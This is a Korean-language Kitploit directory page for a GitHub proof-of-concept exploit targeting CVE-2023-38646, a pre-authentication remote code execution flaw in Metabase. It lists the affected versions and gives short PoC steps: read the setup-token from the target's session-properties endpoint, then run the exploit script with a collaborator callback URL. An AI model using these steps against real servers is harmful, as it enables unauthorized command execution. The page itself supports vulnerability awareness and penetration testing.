Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-38646 — Metabase 사전 인증 RCE (CVE-2023-38646) | Kitploit
도구/GitHubGitHub/kh4sh3i/cve-2023-38646
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubkh4sh3i/cve-2023-38646

CVE-2023-38646

Metabase 사전 인증 RCE (CVE-2023-38646)

저장소 보기
93년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유



Metabase

Metabase는 다양한 데이터베이스와 데이터 소스의 데이터를 사용하여 차트와 대시보드를 만들 수 있는 오픈 소스 비즈니스 인텔리전스 도구입니다. GitHub에서 33,000개 이상의 스타를 받은 인기 프로젝트이며, 지난 몇 년간 취약점 연구 관점에서 상당한 조사를 받아왔습니다.

CVE-2023-38646 - Metabase 사전 인증 RCE

Metabase 오픈 소스 0.46.6.1 이전 버전과 Metabase Enterprise 1.46.6.1 이전 버전에서는 공격자가 서버의 권한 수준으로 서버에서 임의의 명령을 실행할 수 있습니다. 악용을 위해 인증은 필요하지 않습니다. 그 외 수정된 버전은 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, 1.43.7.2입니다.

PoC 단계

root@kitploit:~
* go to : http://target.com/api/session/properties
* copy : setup-token
* get collaborator url
root@kitploit:~
python3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>

취약한 버전

root@kitploit:~
Metabase Enterprise 1.46 < 1.46.6.1
Metabase Enterprise 1.45 < 1.45.4.1
Metabase Enterprise 1.44 < 1.44.7.1
Metabase Enterprise 1.43 < 1.43.7.2
Metabase open source 0.46 < 0.46.6.1
Metabase open source 0.45 < v0.45.4.1
Metabase open source 0.44 < 0.44.7.1
Metabase open source 0.43 < 0.43.7.2

참고 자료

  • assetnote
도구 다운로드